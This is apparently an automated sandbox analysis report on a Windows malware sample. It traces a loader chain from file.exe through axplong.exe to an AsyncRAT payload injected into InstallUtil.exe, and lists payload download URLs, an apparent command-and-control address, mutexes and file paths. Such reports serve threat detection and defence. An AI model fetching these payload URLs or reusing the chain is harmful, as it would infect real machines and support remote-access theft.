Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe07.EXER
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe2
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exe32.EXEu
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeP
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exePV
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeV
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeY
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exeZ0Y
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exed
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef59
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef59e5d67ee87
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exef5E
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exej
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exep
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exep0g
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exepf0
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exes
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Files/5.exet
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/Local
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/c
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.130.147.211/ert
Source: axplong.exe, 00000009.00000002.2685071970.0000000001168000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php(x8
Source: axplong.exe, 00000009.00000002.2685071970.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php00342001
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpRNAM
Source: axplong.exe, 00000009.00000002.2685071970.00000000011D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnd
Source: axplong.exe, 00000009.00000002.2685071970.000000000117D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.2685071970.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe
Source: axplong.exe, 00000009.00000002.2685071970.000000000118E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe5867
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: 5[1].exe.9.dr String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: 5[1].exe.9.dr String found in binary or memory: http://html4/loose.dtd
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002B47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5[1].exe.9.dr String found in binary or memory: http://scripts.sil.org/OFL
Source: 5[1].exe.9.dr String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht
Source: 5[1].exe.9.dr String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: rstxdhuj.exe, 0000000A.00000002.2018046376.000000000379A000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 5[1].exe.9.dr String found in binary or memory: https://github.com/uber-go/dig/issues/new
Source: 5[1].exe.9.dr String found in binary or memory: https://login.chinacloudapi.cn/cannot
Source: 5[1].exe.9.dr String found in binary or memory: https://login.microsoftonline.com/crypto/rc4:
Source: 5[1].exe.9.dr String found in binary or memory: https://management.azure.commismatching
Source: 5[1].exe.9.dr String found in binary or memory: https://management.chinacloudapi.cnmlkem768:
Source: 5[1].exe.9.dr String found in binary or memory: https://management.usgovcloudapi.nethttps://management.core.windows.net/%v:
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: rstxdhuj.exe, 0000000A.00000002.2026739271.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B10F0 NtResumeThread, 10_2_059B10F0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B10E8 NtResumeThread, 10_2_059B10E8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3FE00 NtProtectVirtualMemory, 10_2_05E3FE00
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00243068 9_2_00243068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00204CF0 9_2_00204CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00237D83 9_2_00237D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0024765B 9_2_0024765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00204AF0 9_2_00204AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00248720 9_2_00248720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00246F09 9_2_00246F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0024777B 9_2_0024777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00242BD0 9_2_00242BD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008FC7C8 10_2_008FC7C8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0B78 10_2_008F0B78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0EA0 10_2_008F0EA0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F21D1 10_2_008F21D1
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F2121 10_2_008F2121
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F2458 10_2_008F2458
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F879B 10_2_008F879B
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F87A8 10_2_008F87A8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0E91 10_2_008F0E91
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0EDA 10_2_008F0EDA
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F8E30 10_2_008F8E30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F0F51 10_2_008F0F51
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F140F 10_2_008F140F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F17E5 10_2_008F17E5
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_008F18E3 10_2_008F18E3
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_049D0B10 10_2_049D0B10
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_049D0B01 10_2_049D0B01
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B3F18 10_2_059B3F18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BC148 10_2_059BC148
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BA030 10_2_059BA030
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B3F08 10_2_059B3F08
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BAE8C 10_2_059BAE8C
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BC138 10_2_059BC138
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BA020 10_2_059BA020
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059BB200 10_2_059BB200
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059B424D 10_2_059B424D
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CD1C0 10_2_059CD1C0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C9170 10_2_059C9170
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CFC88 10_2_059CFC88
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C3A58 10_2_059C3A58
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CD1B0 10_2_059CD1B0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059C915F 10_2_059C915F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059CFC78 10_2_059CFC78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DACE0 10_2_059DACE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D142C 10_2_059D142C
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D0040 10_2_059D0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DBA78 10_2_059DBA78
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DA559 10_2_059DA559
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DA568 10_2_059DA568
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DACD0 10_2_059DACD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D5180 10_2_059D5180
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D4118 10_2_059D4118
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D4108 10_2_059D4108
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059D516F 10_2_059D516F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_059DBA68 10_2_059DBA68
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD7DB1 10_2_05AD7DB1
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADBDC0 10_2_05ADBDC0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADF410 10_2_05ADF410
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD8BE0 10_2_05AD8BE0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADCFB8 10_2_05ADCFB8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADC0E7 10_2_05ADC0E7
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD0040 10_2_05AD0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD8BD0 10_2_05AD8BD0
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA0006 10_2_05BA0006
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA0040 10_2_05BA0040
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3DF18 10_2_05E3DF18
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E3D270 10_2_05E3D270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 11_2_02C113B8 11_2_02C113B8
One or more processes crash
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 904
PE file contains more sections than normal
Source: 5.exe.9.dr Static PE information: Number of sections : 12 > 10
Source: 5[1].exe.9.dr Static PE information: Number of sections : 12 > 10
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.rstxdhuj.exe.365fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.rstxdhuj.exe.3611590.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2669149156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2005733540.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2018046376.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: rstxdhuj.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rstxdhuj[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ylrdnrwcx.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9974082510217984
Source: file.exe Static PE information: Section: ekhnjnoj ZLIB complexity 0.9941347456351596
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974082510217984
Source: axplong.exe.0.dr Static PE information: Section: ekhnjnoj ZLIB complexity 0.9941347456351596
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/8@1/3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:64:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe"
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 904
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
